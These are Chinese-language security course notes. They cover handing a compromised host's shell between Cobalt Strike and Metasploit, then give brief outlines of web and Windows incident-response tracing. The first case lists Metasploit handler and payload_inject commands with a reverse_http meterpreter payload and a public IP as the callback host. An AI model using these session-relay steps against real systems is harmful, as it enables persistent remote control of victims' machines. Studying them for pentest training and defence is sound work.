学习的主要是cs、msf、powershell的会话委派
实现这几种工具的联动,为什么要实现联动,就是因为有时候权限给到powershell它没有一些功能,它可以转到cs,cs可以转到msf。权限相互传递,相互委派!
MSF&Cobaltstrike联动shell
WEB攻击应急响应溯源-后门,日志
WIN系统攻击应急响应溯源-后门,日志,流量
临时看CTF如何进对应
演示案例:
• MSF&CobaltStrike联动Shell
• WEB攻击应急响应朔源-后门,日志
• WIN系统攻击应急响应朔源-后门,日志,流量
• 临时给大家看看学的好的怎么干对应CTF比赛
案例1-MSF&CobaltStrike联动Shell
为什么要进行联动?因为cs和msf经常相互调用,有一些功能cs强一点,有一些可能msf强一点,所以在渗透测试的时候经常要切换!
powershell用的不多,就不介绍了
CS->MSF
创建Foreign监听器->MSF监听模块设置对应地址端口->CS执行Spawn选择监听器
演示(cs移交到msf):
msf进去选择监听模块:
use exploit/multi/handler
set payload windows/meterpreter/reverse_http(这个payload要跟设置的payload保持一致)
set lhost 0.0.0.0(不设置也行)
set lport 4444
exploit
想把shell反弹给谁就选中哪一台主机,比如选中webserver右键spawn(权力委派)——选择刚刚生成的msf
选择之后如果还没有反弹结果,肯定就是网络问题,就要看看自己是什么服务器了(如果是虚拟机,一般没什么问题。但是阿里云服务器上面有个端口问题,要开启4444端口)还可以右键session——sleep设1
记住session是几,后面演示msf还会话给它的时候选择一样的session
msf6 exploit(multi/handler)>sessions 想用哪个session就用哪个,这里是4
MSF->CS
CS创建监听器->MSF载入新模块注入设置对应地址端口->执行CS等待上线
use exploit/windows/local/payload_inject
站在攻击者的角度,去分析。攻击者当前拿到哪些权限,网站还是系统权限。装没装杀软,用渗透者的思路去想问题。
注重信息搜集,从攻击面入手查看应急响应。
演示:
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set lport 5566
set lhost 101.37.160.211
set session 4 //选择上面cs到msf上的session
exploit
会话4的shell就反弹到CS上面了
案例2-WEB攻击应急响应溯源-后门,日志
故事回顾:某客户反应自己的网站首页出现篡改,请求支援
分析:涉及的攻击面,涉及的操作权限,涉及的攻击意图,涉及的攻击方式
思路1:利用日志定位修改时间基数,将前时间进行攻击分析,后时间进行操作分析
思路2:利用后门webshell查杀脚本或工具找到对应后门文件,定位第一次时间分析
tasklist /svc 查看pid进程号(windows)
查看access.log文件,查看日志 (查看工具指纹)
案例3-WIN系统攻击应急溯源-后门,日志,流量
分析:涉及的攻击面,涉及的操作权限,涉及的攻击意图,涉及的攻击方式
故事回顾:某客户反应服务器出现卡顿等情况,请求支援
思路:利用监控工具分析可疑文件,利用接口工具抓流量
获取进行监控:PCHunter64
ua userassistview 可查看exe进程运行时间,便于分析计算机发生的事情。